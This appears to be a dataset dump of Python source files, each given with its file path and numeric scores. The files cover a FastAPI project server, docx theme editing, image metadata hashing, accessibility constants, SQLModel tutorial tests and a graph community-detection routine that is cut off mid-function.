from projects import __version__, api
from projects.database import init_db
from projects.exceptions import (
BadRequest,
Forbidden,
InternalServerError,
NotFound,
ServiceUnavailable,
)
app = FastAPI(
title="PlatIAgro Projects",
description="These are the docs for PlatIAgro Projects API. The endpoints below are usually accessed by the PlatIAgro Web-UI",
version=__version__,
)
app.include_router(api.projects.router)
app.include_router(api.comparisons.router)
app.include_router(api.experiments.router)
app.include_router(api.experiment_data.router)
app.include_router(api.experiment_operators.router)
app.include_router(api.experiment_runs.router)
app.include_router(api.datasets.router)
app.include_router(api.figures.router)
app.include_router(api.experiment_logs.router)
app.include_router(api.metrics.router)
app.include_router(api.results.router)
app.include_router(api.operator_parameters.router)
app.include_router(api.deployments.router)
app.include_router(api.deployment_operators.router)
app.include_router(api.deployment_runs.router)
app.include_router(api.deployment_logs.router)
app.include_router(api.monitorings.router)
app.include_router(api.monitoring_figures.router)
app.include_router(api.predictions.router)
app.include_router(api.tasks.router)
app.include_router(api.parameters.router)
app.include_router(api.templates.router)
app.include_router(api.responses.router)
app.include_router(api.healthcheck.router)
@app.on_event("startup")
async def startup_event():
"""
Run before the application starts. Creates tables in the database.
"""
init_db()
@app.get("/", response_class=PlainTextResponse)
async def ping():
"""
Handles GET requests to /.
"""
return "pong"
@app.exception_handler(BadRequest)
@app.exception_handler(NotFound)
@app.exception_handler(InternalServerError)
@app.exception_handler(Forbidden)
@app.exception_handler(ServiceUnavailable)
async def handle_errors(request: Request, exception: Exception):
"""
Handles exceptions raised by the API.
Parameters
----------
request : Request
exception : Exception
Returns
-------
JSONResponse
"""
return JSONResponse(
status_code=exception.status_code,
content={
"code": exception.code,
"message": exception.message,
},
)
def enable_cors():
"""
Enables CORS preflight requests.
"""
@app.options("/{rest_of_path:path}")
async def preflight_handler(request: Request, rest_of_path: str) -> Response:
"""
Handles CORS preflight requests.
"""
response = Response()
response.headers["Access-Control-Allow-Origin"] = "*"
response.headers[
"Access-Control-Allow-Methods"
] = "POST, GET, DELETE, PATCH, OPTIONS"
response.headers["Access-Control-Allow-Headers"] = "Authorization, Content-Type"
return response
@app.middleware("http")
async def add_cors_header(request: Request, call_next):
"""
Sets CORS headers.
"""
response = await call_next(request)
response.headers["Access-Control-Allow-Origin"] = "*"
response.headers[
"Access-Control-Allow-Methods"
] = "POST, GET, DELETE, PATCH, OPTIONS"
response.headers["Access-Control-Allow-Headers"] = "Authorization, Content-Type"
return response
if os.getenv("ENABLE_CORS"):
enable_cors()
def parse_args(args):
"""Takes argv and parses API options."""
parser = argparse.ArgumentParser(
description="Projects API",
)
parser.add_argument(
"--host",
type=str,
default="127.0.0.1",
help="Host for HTTP server (default: 127.0.0.1)",
)
parser.add_argument(
"--port",
type=int,
default=8080,
help="Port for HTTP server (default: 8080)",
)
return parser.parse_args(args)
if __name__ == "__main__":
args = parse_args(sys.argv[1:])
uvicorn.run(app, host=args.host, port=args.port) | projects/api/main.py | """ASGI server."""
import argparse
import os
import sys
import uvicorn
from fastapi import FastAPI, Request
from fastapi.responses import JSONResponse, PlainTextResponse, Response
from projects import __version__, api
from projects.database import init_db
from projects.exceptions import (
BadRequest,
Forbidden,
InternalServerError,
NotFound,
ServiceUnavailable,
)
app = FastAPI(
title="PlatIAgro Projects",
description="These are the docs for PlatIAgro Projects API. The endpoints below are usually accessed by the PlatIAgro Web-UI",
version=__version__,
)
app.include_router(api.projects.router)
app.include_router(api.comparisons.router)
app.include_router(api.experiments.router)
app.include_router(api.experiment_data.router)
app.include_router(api.experiment_operators.router)
app.include_router(api.experiment_runs.router)
app.include_router(api.datasets.router)
app.include_router(api.figures.router)
app.include_router(api.experiment_logs.router)
app.include_router(api.metrics.router)
app.include_router(api.results.router)
app.include_router(api.operator_parameters.router)
app.include_router(api.deployments.router)
app.include_router(api.deployment_operators.router)
app.include_router(api.deployment_runs.router)
app.include_router(api.deployment_logs.router)
app.include_router(api.monitorings.router)
app.include_router(api.monitoring_figures.router)
app.include_router(api.predictions.router)
app.include_router(api.tasks.router)
app.include_router(api.parameters.router)
app.include_router(api.templates.router)
app.include_router(api.responses.router)
app.include_router(api.healthcheck.router)
@app.on_event("startup")
async def startup_event():
"""
Run before the application starts. Creates tables in the database.
"""
init_db()
@app.get("/", response_class=PlainTextResponse)
async def ping():
"""
Handles GET requests to /.
"""
return "pong"
@app.exception_handler(BadRequest)
@app.exception_handler(NotFound)
@app.exception_handler(InternalServerError)
@app.exception_handler(Forbidden)
@app.exception_handler(ServiceUnavailable)
async def handle_errors(request: Request, exception: Exception):
"""
Handles exceptions raised by the API.
Parameters
----------
request : Request
exception : Exception
Returns
-------
JSONResponse
"""
return JSONResponse(
status_code=exception.status_code,
content={
"code": exception.code,
"message": exception.message,
},
)
def enable_cors():
"""
Enables CORS preflight requests.
"""
@app.options("/{rest_of_path:path}")
async def preflight_handler(request: Request, rest_of_path: str) -> Response:
"""
Handles CORS preflight requests.
"""
response = Response()
response.headers["Access-Control-Allow-Origin"] = "*"
response.headers[
"Access-Control-Allow-Methods"
] = "POST, GET, DELETE, PATCH, OPTIONS"
response.headers["Access-Control-Allow-Headers"] = "Authorization, Content-Type"
return response
@app.middleware("http")
async def add_cors_header(request: Request, call_next):
"""
Sets CORS headers.
"""
response = await call_next(request)
response.headers["Access-Control-Allow-Origin"] = "*"
response.headers[
"Access-Control-Allow-Methods"
] = "POST, GET, DELETE, PATCH, OPTIONS"
response.headers["Access-Control-Allow-Headers"] = "Authorization, Content-Type"
return response
if os.getenv("ENABLE_CORS"):
enable_cors()
def parse_args(args):
"""Takes argv and parses API options."""
parser = argparse.ArgumentParser(
description="Projects API",
)
parser.add_argument(
"--host",
type=str,
default="127.0.0.1",
help="Host for HTTP server (default: 127.0.0.1)",
)
parser.add_argument(
"--port",
type=int,
default=8080,
help="Port for HTTP server (default: 8080)",
)
return parser.parse_args(args)
if __name__ == "__main__":
args = parse_args(sys.argv[1:])
uvicorn.run(app, host=args.host, port=args.port) | 0.560012 | 0.069605 |
import os
import subprocess
import sys
import tempfile
import uuid
import zipfile
from collections import Iterable
import requests
from defusedxml.lxml import fromstring
from lxml import etree
from pypandoc import get_pandoc_path
from docmaker.hooks import Hook
THEME_COLORS = (
"dk1",
"lt1",
"dk2",
"lt2",
"accent1",
"accent2",
"accent3",
"accent4",
"accent5",
"accent6",
"hlink",
"folHlink",
)
class Theme:
@Hook("pre_convert_to_docx", predicate=(
lambda ctx: ctx.get_options("theme")
))
def update_theme_xml(self, ctx):
if ctx.reference_doc is None:
ctx._reference_doc = ctx.get_temp_file(suffix=".docx")
subprocess.run(
[
get_pandoc_path(),
"-o", ctx.reference_doc,
"--print-default-data-file", "reference.docx"
],
check=True,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
with tempfile.TemporaryDirectory(dir=ctx.tmpdir) as tmpdir:
with zipfile.ZipFile(ctx.reference_doc) as zf:
zf.extractall(tmpdir)
styles_xml_file = os.path.join(tmpdir, "word", "styles.xml")
theme_xml_file = os.path.join(tmpdir, "word", "theme", "theme1.xml")
if not os.path.exists(theme_xml_file):
return
with open(styles_xml_file, "rb") as f:
styles_xml = fromstring(f.read())
with open(theme_xml_file, "rb") as f:
theme_xml = fromstring(f.read())
clrScheme = theme_xml.find("a:themeElements/a:clrScheme", namespaces=theme_xml.nsmap)
for color in THEME_COLORS:
if f"theme.color_{color}" not in ctx:
continue
colorValue = ctx[f"theme.color_{color}"]
clr = clrScheme.find(f"a:{color}", namespaces=theme_xml.nsmap)
if clr is None:
raise ValueError(f"{color} is invalid")
if color in ("dk1", "lt1"):
clr = clr.find("a:sysClr", namespaces=theme_xml.nsmap)
attribute_name = "lastClr"
else:
clr = clr.find("a:srgbClr", namespaces=theme_xml.nsmap)
attribute_name = "val"
clr.attrib[attribute_name] = colorValue
for style in styles_xml.findall("w:style", namespaces=styles_xml.nsmap):
clr = style.find("w:rPr/w:color", namespaces=styles_xml.nsmap)
if clr is None:
continue
if clr.get(etree.QName(styles_xml.nsmap["w"], "themeColor")) != color:
continue
clr.set(etree.QName(styles_xml.nsmap["w"], "val"), colorValue)
fontScheme = theme_xml.find("a:themeElements/a:fontScheme", namespaces=theme_xml.nsmap)
if "theme.major_font" in ctx:
latinFont = fontScheme.find("a:majorFont/a:latin", namespaces=theme_xml.nsmap)
latinFont.attrib["typeface"] = ctx["theme.major_font"]
if "theme.minor_font" in ctx:
latinFont = fontScheme.find("a:minorFont/a:latin", namespaces=theme_xml.nsmap)
latinFont.attrib["typeface"] = ctx["theme.minor_font"]
with open(styles_xml_file, "wb") as f:
f.write(etree.tostring(styles_xml, encoding="utf-8", standalone="yes"))
with open(theme_xml_file, "wb") as f:
f.write(etree.tostring(theme_xml, encoding="utf-8", standalone="yes"))
ctx._reference_doc = ctx.get_temp_file(suffix=".docx")
with zipfile.ZipFile(ctx.reference_doc, "w") as zf:
def addToZip(path, zippath):
if os.path.isfile(path):
zf.write(path, zippath, zipfile.ZIP_DEFLATED)
elif os.path.isdir(path):
if zippath:
zf.write(path, zippath)
for nm in sorted(os.listdir(path)):
addToZip(os.path.join(path, nm), os.path.join(zippath, nm))
addToZip(tmpdir, "") | docmaker/features/theme.py | import os
import subprocess
import sys
import tempfile
import uuid
import zipfile
from collections import Iterable
import requests
from defusedxml.lxml import fromstring
from lxml import etree
from pypandoc import get_pandoc_path
from docmaker.hooks import Hook
THEME_COLORS = (
"dk1",
"lt1",
"dk2",
"lt2",
"accent1",
"accent2",
"accent3",
"accent4",
"accent5",
"accent6",
"hlink",
"folHlink",
)
class Theme:
@Hook("pre_convert_to_docx", predicate=(
lambda ctx: ctx.get_options("theme")
))
def update_theme_xml(self, ctx):
if ctx.reference_doc is None:
ctx._reference_doc = ctx.get_temp_file(suffix=".docx")
subprocess.run(
[
get_pandoc_path(),
"-o", ctx.reference_doc,
"--print-default-data-file", "reference.docx"
],
check=True,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
with tempfile.TemporaryDirectory(dir=ctx.tmpdir) as tmpdir:
with zipfile.ZipFile(ctx.reference_doc) as zf:
zf.extractall(tmpdir)
styles_xml_file = os.path.join(tmpdir, "word", "styles.xml")
theme_xml_file = os.path.join(tmpdir, "word", "theme", "theme1.xml")
if not os.path.exists(theme_xml_file):
return
with open(styles_xml_file, "rb") as f:
styles_xml = fromstring(f.read())
with open(theme_xml_file, "rb") as f:
theme_xml = fromstring(f.read())
clrScheme = theme_xml.find("a:themeElements/a:clrScheme", namespaces=theme_xml.nsmap)
for color in THEME_COLORS:
if f"theme.color_{color}" not in ctx:
continue
colorValue = ctx[f"theme.color_{color}"]
clr = clrScheme.find(f"a:{color}", namespaces=theme_xml.nsmap)
if clr is None:
raise ValueError(f"{color} is invalid")
if color in ("dk1", "lt1"):
clr = clr.find("a:sysClr", namespaces=theme_xml.nsmap)
attribute_name = "lastClr"
else:
clr = clr.find("a:srgbClr", namespaces=theme_xml.nsmap)
attribute_name = "val"
clr.attrib[attribute_name] = colorValue
for style in styles_xml.findall("w:style", namespaces=styles_xml.nsmap):
clr = style.find("w:rPr/w:color", namespaces=styles_xml.nsmap)
if clr is None:
continue
if clr.get(etree.QName(styles_xml.nsmap["w"], "themeColor")) != color:
continue
clr.set(etree.QName(styles_xml.nsmap["w"], "val"), colorValue)
fontScheme = theme_xml.find("a:themeElements/a:fontScheme", namespaces=theme_xml.nsmap)
if "theme.major_font" in ctx:
latinFont = fontScheme.find("a:majorFont/a:latin", namespaces=theme_xml.nsmap)
latinFont.attrib["typeface"] = ctx["theme.major_font"]
if "theme.minor_font" in ctx:
latinFont = fontScheme.find("a:minorFont/a:latin", namespaces=theme_xml.nsmap)
latinFont.attrib["typeface"] = ctx["theme.minor_font"]
with open(styles_xml_file, "wb") as f:
f.write(etree.tostring(styles_xml, encoding="utf-8", standalone="yes"))
with open(theme_xml_file, "wb") as f:
f.write(etree.tostring(theme_xml, encoding="utf-8", standalone="yes"))
ctx._reference_doc = ctx.get_temp_file(suffix=".docx")
with zipfile.ZipFile(ctx.reference_doc, "w") as zf:
def addToZip(path, zippath):
if os.path.isfile(path):
zf.write(path, zippath, zipfile.ZIP_DEFLATED)
elif os.path.isdir(path):
if zippath:
zf.write(path, zippath)
for nm in sorted(os.listdir(path)):
addToZip(os.path.join(path, nm), os.path.join(zippath, nm))
addToZip(tmpdir, "") | 0.149904 | 0.061537 |
import numpy as np
import pandas as pd
import hashlib
CHUNK_SIZE = 4096
# Required metadata fields - everything else goes into a json
META_NAMES = ["ChannelIndex",
"Slice",
"FrameIndex",
"Channel",
"FileName",
"PositionIndex"]
DF_NAMES = ["channel_idx",
"slice_idx",
"time_idx",
"channel_name",
"file_name",
"pos_idx",
"sha256"]
def make_dataframe(nbr_frames=None, col_names=DF_NAMES):
"""
Create empty pandas dataframe given indices and column names
:param [None, int] nbr_frames: The number of rows in the dataframe
:param list of strs col_names: The dataframe column names
:return dataframe frames_meta: Empty dataframe with given
indices and column names
"""
if nbr_frames is not None:
# Get metadata and path for each frame
frames_meta = pd.DataFrame(
index=range(nbr_frames),
columns=col_names,
)
else:
frames_meta = pd.DataFrame(columns=col_names)
return frames_meta
def validate_global_meta(global_meta):
"""
Validate that global frames meta dictionary contain all required values.
:param dict global_meta: Global frames metadata
:raise AssertionError: if not all keys are present
"""
keys = ["storage_dir",
"nbr_frames",
"im_width",
"im_height",
"nbr_slices",
"nbr_channels",
"im_colors",
"nbr_timepoints",
"nbr_positions",
"bit_depth"]
keys_valid = np.zeros(len(keys), dtype='bool')
for idx, key in enumerate(keys):
key_valid = (key in global_meta) and \
(global_meta[key] is not None)
keys_valid[idx] = key_valid
assert np.all(keys_valid),\
"Not all required metadata keys are present"
def gen_sha256(image):
"""
Generate the sha-256 hash of an image. If the user
passes in a numpy ndarray (usually a frame), hash the
whole numpy. If the user passes in a file path, the
function will hash the file in 4kB chucks
:param ndarray/String image: ndarray containing the image to hash
or string containing path to file
to hash
:return String sha256: sha-256 hash of the input image
"""
sha = hashlib.sha256()
# If a frame is passed in, hash the numpy array
if isinstance(image, np.ndarray):
sha.update(image.tobytes())
# If a file path is passed in, hash the file in 4kB chunks
elif isinstance(image, str):
with open(image,"rb") as im:
for byte_block in iter(lambda: im.read(CHUNK_SIZE),b""):
sha.update(byte_block)
else:
raise TypeError('image must be a numpy ndarray (frame)',
'or str (file path)')
return sha.hexdigest() | imaging_db/utils/meta_utils.py | import numpy as np
import pandas as pd
import hashlib
CHUNK_SIZE = 4096
# Required metadata fields - everything else goes into a json
META_NAMES = ["ChannelIndex",
"Slice",
"FrameIndex",
"Channel",
"FileName",
"PositionIndex"]
DF_NAMES = ["channel_idx",
"slice_idx",
"time_idx",
"channel_name",
"file_name",
"pos_idx",
"sha256"]
def make_dataframe(nbr_frames=None, col_names=DF_NAMES):
"""
Create empty pandas dataframe given indices and column names
:param [None, int] nbr_frames: The number of rows in the dataframe
:param list of strs col_names: The dataframe column names
:return dataframe frames_meta: Empty dataframe with given
indices and column names
"""
if nbr_frames is not None:
# Get metadata and path for each frame
frames_meta = pd.DataFrame(
index=range(nbr_frames),
columns=col_names,
)
else:
frames_meta = pd.DataFrame(columns=col_names)
return frames_meta
def validate_global_meta(global_meta):
"""
Validate that global frames meta dictionary contain all required values.
:param dict global_meta: Global frames metadata
:raise AssertionError: if not all keys are present
"""
keys = ["storage_dir",
"nbr_frames",
"im_width",
"im_height",
"nbr_slices",
"nbr_channels",
"im_colors",
"nbr_timepoints",
"nbr_positions",
"bit_depth"]
keys_valid = np.zeros(len(keys), dtype='bool')
for idx, key in enumerate(keys):
key_valid = (key in global_meta) and \
(global_meta[key] is not None)
keys_valid[idx] = key_valid
assert np.all(keys_valid),\
"Not all required metadata keys are present"
def gen_sha256(image):
"""
Generate the sha-256 hash of an image. If the user
passes in a numpy ndarray (usually a frame), hash the
whole numpy. If the user passes in a file path, the
function will hash the file in 4kB chucks
:param ndarray/String image: ndarray containing the image to hash
or string containing path to file
to hash
:return String sha256: sha-256 hash of the input image
"""
sha = hashlib.sha256()
# If a frame is passed in, hash the numpy array
if isinstance(image, np.ndarray):
sha.update(image.tobytes())
# If a file path is passed in, hash the file in 4kB chunks
elif isinstance(image, str):
with open(image,"rb") as im:
for byte_block in iter(lambda: im.read(CHUNK_SIZE),b""):
sha.update(byte_block)
else:
raise TypeError('image must be a numpy ndarray (frame)',
'or str (file path)')
return sha.hexdigest() | 0.698844 | 0.536556 |
STATE_SYSTEM = {
'UNAVAILABLE': 0x00000001, # Если этот бит в поле state кнопки 0, то текст кнопки красный (к примеру, речь о кнопке Applay)
'SELECTED': 0x00000002,
'FOCUSED': 0x00000004,
'PRESSED': 0x00000008,
'CHECKED': 0x00000010,
'MIXED': 0x00000020,
'READONLY': 0x00000040,
'HOTTRACKED': 0x00000080,
'DEFAULT': 0x00000100,
'EXPANDED': 0x00000200,
'COLLAPSED': 0x00000400,
'BUSY': 0x00000800,
'FLOATING': 0x00001000,
'MARQUEED': 0x00002000,
'ANIMATED': 0x00004000,
'INVISIBLE': 0x00008000,
'OFFSCREEN': 0x00010000,
'SIZEABLE': 0x00020000,
'MOVEABLE': 0x00040000,
'SELFVOICING': 0x00080000,
'FOCUSABLE': 0x00100000,
'SELECTABLE': 0x00200000,
'LINKED': 0x00400000,
'TRAVERSED': 0x00800000,
'MULTISELECTABLE': 0x01000000,
'EXTSELECTABLE': 0x02000000,
'ALERT_LOW': 0x04000000,
'ALERT_MEDIUM': 0x08000000,
'ALERT_HIGH': 0x10000000,
'VALID': 0x1fffffff
}
ROLE_SYSTEM = {
'ALERT': 8,
'ANIMATION': 54,
'APPLICATION': 14,
'BORDER': 19,
'BUTTONDROPDOWN': 56,
'BUTTONDROPDOWNGRID': 58,
'BUTTONMENU': 57,
'CARET': 7,
'CELL': 29,
'CHARACTER': 32,
'CHART': 17,
'CHECKBUTTON': 44,
'CLIENT': 10,
'CLOCK': 61,
'COLUMN': 27,
'COLUMNHEADER': 25,
'COMBOBOX': 46,
'CURSOR': 6,
'DIAGRAM': 53,
'DIAL': 49,
'DIALOG': 18,
'DOCUMENT': 15,
'DROPLIST': 47,
'EQUATION': 55,
'GRAPHIC': 40,
'GRIP': 4,
'GROUPING': 20,
'HELPBALLOON': 31,
'HOTKEYFIELD': 50,
'INDICATOR': 39,
'LINK': 30,
'LIST': 33,
'LISTITEM': 34,
'MENUBAR': 2,
'MENUITEM': 12,
'MENUPOPUP': 11,
'OUTLINE': 35,
'OUTLINEITEM': 36,
'PAGETAB': 37,
'PAGETABLIST': 60,
'PANE': 16,
'PROGRESSBAR': 48,
'PROPERTYPAGE': 38,
'PUSHBUTTON': 43,
'RADIOBUTTON': 45,
'ROW': 28,
'ROWHEADER': 26,
'SCROLLBAR': 3,
'SEPARATOR': 21,
'SLIDER': 51,
'SOUND': 5,
'SPINBUTTON': 52,
'STATICTEXT': 41,
'STATUSBAR': 23,
'TABLE': 24,
'TEXT': 42,
'TITLEBAR': 1,
'TOOLBAR': 22,
'TOOLTIP': 13,
'WHITESPACE': 59,
'WINDOW': 9
}
STATE_SYSTEM_rev = {val:key for (key,val) in STATE_SYSTEM.items()}
ROLE_SYSTEM_rev = {val:key for (key,val) in ROLE_SYSTEM.items()} | pikuli/uia/adapter/oleacc_h.py | STATE_SYSTEM = {
'UNAVAILABLE': 0x00000001, # Если этот бит в поле state кнопки 0, то текст кнопки красный (к примеру, речь о кнопке Applay)
'SELECTED': 0x00000002,
'FOCUSED': 0x00000004,
'PRESSED': 0x00000008,
'CHECKED': 0x00000010,
'MIXED': 0x00000020,
'READONLY': 0x00000040,
'HOTTRACKED': 0x00000080,
'DEFAULT': 0x00000100,
'EXPANDED': 0x00000200,
'COLLAPSED': 0x00000400,
'BUSY': 0x00000800,
'FLOATING': 0x00001000,
'MARQUEED': 0x00002000,
'ANIMATED': 0x00004000,
'INVISIBLE': 0x00008000,
'OFFSCREEN': 0x00010000,
'SIZEABLE': 0x00020000,
'MOVEABLE': 0x00040000,
'SELFVOICING': 0x00080000,
'FOCUSABLE': 0x00100000,
'SELECTABLE': 0x00200000,
'LINKED': 0x00400000,
'TRAVERSED': 0x00800000,
'MULTISELECTABLE': 0x01000000,
'EXTSELECTABLE': 0x02000000,
'ALERT_LOW': 0x04000000,
'ALERT_MEDIUM': 0x08000000,
'ALERT_HIGH': 0x10000000,
'VALID': 0x1fffffff
}
ROLE_SYSTEM = {
'ALERT': 8,
'ANIMATION': 54,
'APPLICATION': 14,
'BORDER': 19,
'BUTTONDROPDOWN': 56,
'BUTTONDROPDOWNGRID': 58,
'BUTTONMENU': 57,
'CARET': 7,
'CELL': 29,
'CHARACTER': 32,
'CHART': 17,
'CHECKBUTTON': 44,
'CLIENT': 10,
'CLOCK': 61,
'COLUMN': 27,
'COLUMNHEADER': 25,
'COMBOBOX': 46,
'CURSOR': 6,
'DIAGRAM': 53,
'DIAL': 49,
'DIALOG': 18,
'DOCUMENT': 15,
'DROPLIST': 47,
'EQUATION': 55,
'GRAPHIC': 40,
'GRIP': 4,
'GROUPING': 20,
'HELPBALLOON': 31,
'HOTKEYFIELD': 50,
'INDICATOR': 39,
'LINK': 30,
'LIST': 33,
'LISTITEM': 34,
'MENUBAR': 2,
'MENUITEM': 12,
'MENUPOPUP': 11,
'OUTLINE': 35,
'OUTLINEITEM': 36,
'PAGETAB': 37,
'PAGETABLIST': 60,
'PANE': 16,
'PROGRESSBAR': 48,
'PROPERTYPAGE': 38,
'PUSHBUTTON': 43,
'RADIOBUTTON': 45,
'ROW': 28,
'ROWHEADER': 26,
'SCROLLBAR': 3,
'SEPARATOR': 21,
'SLIDER': 51,
'SOUND': 5,
'SPINBUTTON': 52,
'STATICTEXT': 41,
'STATUSBAR': 23,
'TABLE': 24,
'TEXT': 42,
'TITLEBAR': 1,
'TOOLBAR': 22,
'TOOLTIP': 13,
'WHITESPACE': 59,
'WINDOW': 9
}
STATE_SYSTEM_rev = {val:key for (key,val) in STATE_SYSTEM.items()}
ROLE_SYSTEM_rev = {val:key for (key,val) in ROLE_SYSTEM.items()} | 0.198996 | 0.134151 |
from typing import Any, Dict, List, Union
from unittest.mock import patch
from sqlmodel import create_engine
from tests.conftest import get_testing_print_function
def check_calls(calls: List[List[Union[str, Dict[str, Any]]]]):
assert calls[0] == ["Before interacting with the database"]
assert calls[1] == [
"Hero 1:",
{
"id": None,
"name": "Deadpond",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[2] == [
"Hero 2:",
{
"id": None,
"name": "Spider-Boy",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[3] == [
"Hero 3:",
{
"id": None,
"name": "Rusty-Man",
"secret_name": "<NAME>",
"age": 48,
},
]
assert calls[4] == ["After adding to the session"]
assert calls[5] == [
"Hero 1:",
{
"id": None,
"name": "Deadpond",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[6] == [
"Hero 2:",
{
"id": None,
"name": "Spider-Boy",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[7] == [
"Hero 3:",
{
"id": None,
"name": "Rusty-Man",
"secret_name": "<NAME>",
"age": 48,
},
]
assert calls[8] == ["After committing the session"]
assert calls[9] == ["Hero 1:", {}]
assert calls[10] == ["Hero 2:", {}]
assert calls[11] == ["Hero 3:", {}]
assert calls[12] == ["After committing the session, show IDs"]
assert calls[13] == ["Hero 1 ID:", 1]
assert calls[14] == ["Hero 2 ID:", 2]
assert calls[15] == ["Hero 3 ID:", 3]
assert calls[16] == ["After committing the session, show names"]
assert calls[17] == ["Hero 1 name:", "Deadpond"]
assert calls[18] == ["Hero 2 name:", "Spider-Boy"]
assert calls[19] == ["Hero 3 name:", "Rusty-Man"]
assert calls[20] == ["After refreshing the heroes"]
assert calls[21] == [
"Hero 1:",
{
"id": 1,
"name": "Deadpond",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[22] == [
"Hero 2:",
{
"id": 2,
"name": "Spider-Boy",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[23] == [
"Hero 3:",
{
"id": 3,
"name": "Rusty-Man",
"secret_name": "<NAME>",
"age": 48,
},
]
assert calls[24] == ["After the session closes"]
assert calls[21] == [
"Hero 1:",
{
"id": 1,
"name": "Deadpond",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[22] == [
"Hero 2:",
{
"id": 2,
"name": "Spider-Boy",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[23] == [
"Hero 3:",
{
"id": 3,
"name": "Rusty-Man",
"secret_name": "<NAME>",
"age": 48,
},
]
def test_tutorial_001(clear_sqlmodel):
from docs_src.tutorial.automatic_id_none_refresh import tutorial001 as mod
mod.sqlite_url = "sqlite://"
mod.engine = create_engine(mod.sqlite_url)
calls = []
new_print = get_testing_print_function(calls)
with patch("builtins.print", new=new_print):
mod.main()
check_calls(calls)
def test_tutorial_002(clear_sqlmodel):
from docs_src.tutorial.automatic_id_none_refresh import tutorial002 as mod
mod.sqlite_url = "sqlite://"
mod.engine = create_engine(mod.sqlite_url)
calls = []
new_print = get_testing_print_function(calls)
with patch("builtins.print", new=new_print):
mod.main()
check_calls(calls) | tests/test_tutorial/test_automatic_id_none_refresh/test_tutorial001_tutorial002.py | from typing import Any, Dict, List, Union
from unittest.mock import patch
from sqlmodel import create_engine
from tests.conftest import get_testing_print_function
def check_calls(calls: List[List[Union[str, Dict[str, Any]]]]):
assert calls[0] == ["Before interacting with the database"]
assert calls[1] == [
"Hero 1:",
{
"id": None,
"name": "Deadpond",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[2] == [
"Hero 2:",
{
"id": None,
"name": "Spider-Boy",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[3] == [
"Hero 3:",
{
"id": None,
"name": "Rusty-Man",
"secret_name": "<NAME>",
"age": 48,
},
]
assert calls[4] == ["After adding to the session"]
assert calls[5] == [
"Hero 1:",
{
"id": None,
"name": "Deadpond",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[6] == [
"Hero 2:",
{
"id": None,
"name": "Spider-Boy",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[7] == [
"Hero 3:",
{
"id": None,
"name": "Rusty-Man",
"secret_name": "<NAME>",
"age": 48,
},
]
assert calls[8] == ["After committing the session"]
assert calls[9] == ["Hero 1:", {}]
assert calls[10] == ["Hero 2:", {}]
assert calls[11] == ["Hero 3:", {}]
assert calls[12] == ["After committing the session, show IDs"]
assert calls[13] == ["Hero 1 ID:", 1]
assert calls[14] == ["Hero 2 ID:", 2]
assert calls[15] == ["Hero 3 ID:", 3]
assert calls[16] == ["After committing the session, show names"]
assert calls[17] == ["Hero 1 name:", "Deadpond"]
assert calls[18] == ["Hero 2 name:", "Spider-Boy"]
assert calls[19] == ["Hero 3 name:", "Rusty-Man"]
assert calls[20] == ["After refreshing the heroes"]
assert calls[21] == [
"Hero 1:",
{
"id": 1,
"name": "Deadpond",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[22] == [
"Hero 2:",
{
"id": 2,
"name": "Spider-Boy",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[23] == [
"Hero 3:",
{
"id": 3,
"name": "Rusty-Man",
"secret_name": "<NAME>",
"age": 48,
},
]
assert calls[24] == ["After the session closes"]
assert calls[21] == [
"Hero 1:",
{
"id": 1,
"name": "Deadpond",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[22] == [
"Hero 2:",
{
"id": 2,
"name": "Spider-Boy",
"secret_name": "<NAME>",
"age": None,
},
]
assert calls[23] == [
"Hero 3:",
{
"id": 3,
"name": "Rusty-Man",
"secret_name": "<NAME>",
"age": 48,
},
]
def test_tutorial_001(clear_sqlmodel):
from docs_src.tutorial.automatic_id_none_refresh import tutorial001 as mod
mod.sqlite_url = "sqlite://"
mod.engine = create_engine(mod.sqlite_url)
calls = []
new_print = get_testing_print_function(calls)
with patch("builtins.print", new=new_print):
mod.main()
check_calls(calls)
def test_tutorial_002(clear_sqlmodel):
from docs_src.tutorial.automatic_id_none_refresh import tutorial002 as mod
mod.sqlite_url = "sqlite://"
mod.engine = create_engine(mod.sqlite_url)
calls = []
new_print = get_testing_print_function(calls)
with patch("builtins.print", new=new_print):
mod.main()
check_calls(calls) | 0.77569 | 0.584093 |
import itertools
import numpy
import networkx as nx
from Queue import Queue
def graph_symmetries(graph):
"""
Finds all symmetries of a graph. This is computationally very expensive
O(N!) where N is the number of nodes in graph.
"""
permutations = [dict(zip(graph.nodes_iter(), perm)) for perm in
itertools.permutations(graph.nodes_iter())]
keys = subgraph.nodes()
keys.sort()
symmetries = [[perm[node] for node in keys] for perm in permutations if
all(graph.has_edge(perm[src], perm[tar])
for (src, tar) in graph.edges_iter())]
return symmetries
def kernighan_lin_refinement(s, b):
"""
Parameters
----------
s: array-like
State vector partitioning the nodes into communities (contains 1s and
-1s).
b: matrix
Modularity matrix.
"""
dot = numpy.dot
def flip(v, pos):
v[pos] = -v[pos]
dq = dot(v, dot(b.A, v))
v[pos] = -v[pos]
return dq
s_len = len(s)
trials = numpy.zeros(s_len)
q_max = dot(s, dot(b.A, s))
while True:
for i in xrange(s_len):
trials[i] = flip(s, i)
dq = trials.max()
if dq > q_max:
i = trials.argmax()
s[i] = -s[i]
q_max = dq
else:
break
def spectral_community_detection(graph, weighted=True, threshold=1E-12,
error_margin=1E-12, refine=True, max_iter=500):
"""
Finds communities in a graph via spectral partitioning.
Requires a graph whose nodes are integers from 0 to (number of nodes - 1).
"""
dot = numpy.dot
norm = numpy.linalg.norm
ix = numpy.ix_
kronecker = numpy.kron
array = numpy.array
real = numpy.real
eigensystem = numpy.linalg.eig
def _split(nbunch):
len_nodes = len(nbunch)
# use the relevant subpart of the modularity matrix
sub_b = b[ix(nbunch, nbunch)].copy()
